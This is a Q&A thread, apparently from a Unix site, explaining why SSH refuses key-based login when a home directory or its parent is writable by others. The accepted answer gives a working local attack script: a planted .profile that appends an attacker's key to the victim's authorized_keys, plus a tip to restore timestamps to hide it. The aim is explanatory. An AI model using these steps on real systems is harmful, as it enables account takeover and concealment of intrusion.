# Why is it a security risk for SSH with public-private key if the home folder is writable for the group?

Tags: ssh

I spent a long time trying to figure out why SSH with a public-private key wasn't working for me between two servers. It turned out that, the reason was, that the user’s home directory was writ-able for the group on the server I tried to connect to.

What is the increased security risk for SSH to deny public-private key login, when the user folder is writeable to the group versus when it is not writ-able to the group? I understand the rationale for the expected restrictive limitation of .ssh folder themselves, and so the files within it. But, why is there a danger for home directory itself? What constellation can do this dangerously?

Answer (score 2, accepted):

If `/home`, or any other parent of an `.ssh` directory is writable I can move the direct children out of the way causing at the very least a denial of service:

```
ls -ld /home
drwxrwxrwx 9 root root 20480 Sep  4 21:28 /home

mv /home/victim /home/casualty
```

Now `victim` cannot log in with an ssh key. (A password would still work, though.)

---

Let's assume that "victim" has a valid password and can shrug off the failure of the `ssh` key as just one of those things. Particularly as (we hope) it won't be a reproducible problem. In this scenario we can create a quiet escalation of privilege:

```
# Save the original directory and contents
mv /home/victim /home/casualty
mkdir -m777 /home/victim

# Create a fake profile to place and then hide the evidence
cat <<'EOF' >/home/victim/.profile

if [ -r /tmp/.id.pub ] && [ -d /home/casualty ]
then
    # Not really very nice
    mkdir -m700 -p /home/casualty/.ssh
    cat /tmp/.id.pub >>/home/casualty/.ssh/authorized_keys
fi

mv /home/victim /home/victim.nomore
mv /home/casualty /home/victim

if [ "$SHELL" = /bin/bash ]
then
    if [ -f /home/victim/.bash_profile ]
    then
        . /home/victim/.bash_profile
    elif [ -f /home/victim/.profile ]
    then
        . /home/victim/.profile
    fi
else
    [ -f /home/victim/.profile ] && . /home/victim/.profile
fi

rm -rf /home/victim.nomore
EOF
```

Finally, place your own public `ssh` key into `/tmp/.id.pub` and wait for the victim to log in. Once they have done that you should find that your own `ssh` key has been added to their `authorized_keys` list and you can log in as them:

```
 ssh victim@remoteHost
```

For bonus points you could extend the attack to capture the original datestamp on the `authorized_keys` file and restore it after adding your own key (see `stat --format '%Y'` and `touch --date`).

---

If the scenario is simply that a user's home directory itself it writeable, then *to my knowledge* only generate a denial of service against the `ssh` keys themselves:

```
cd ~victim
mv .ssh .ssh.casualty
```

Either leave it like that, so that `ssh` keys are no longer available, or attempt to add a new key:

```
mkdir -m755 .ssh
cat /tmp/.id.pub .ssh.casualty/authorized_keys >.ssh/authorized_keys
```

In this second case `ssh` objects, and the attack fails:

```
Sep  5 15:16:51 pi sshd[16695]: Authentication refused: bad ownership or modes for directory /home/victim
```

Ownership and permissions are still checked on `.ssh` and `.ssh/authorized_keys`, however, so you are really no better off.

Comment: **is a directory permission of 750 *drwxr-x---* an issue at all?**  I am handed down a security rule that stipulates account home directories to be specifically 700... but does not go into detail various reasons why... where this thread is good as it points out one specific problem.

Comment: ^^^ a"home directory" permission, which is specified in `/etc/passwd`

Comment: @ron totally depends on context. At uni we had that 700 rule due to students not understanding that default permissions left their files readable by everyone. This was a problem for plagiarism in an academic context.

Comment: in olden days, with an HTTP server running and serving files from the users' home directories, you might need to have permissions of at least 0701 to let the web server access `~user/.www` or whatever... Provided all users are in the same primary group, that would still prevent other users from accessing each other's home directories. (Yes, ACLs would be better, or putting the web homes somewhere else, but, you know) Too bad with the usual permission system, a user can change the permissions of their home directory.

Answer (score 4):

If the home directory is group-writable, any user in that group can modify the `.ssh` directory itself, e.g.:

```
mv ~some_user/.ssh /who/cares/where
mkdir ~some_user/.ssh
cp /my/public/key ~some_user/.ssh/authorized_keys
```

And gain access to that user's account.

Comment: @PhilipCouling, at least it serves as a warning that someone could mess up your SSH config (by removing it, that is, preventing you from logging in with keys). There's also the remote possibility that they could find some other directory with a different `authorized_keys` file and install it in the right place.

Comment: @PhilipCouling I don't have sufficient imaginative skills for it, but someone who has might be able to create a TOCTOU race here.

Comment: To be clear, I think this is the right reason, but the exploit as presented wouldn't work.  Perhaps it's more likely as partially social engineering, (eg attacker seds someone a zip containing their public key, victim unzips it to their home directory, attacker then quickly swaps things around with `mv`)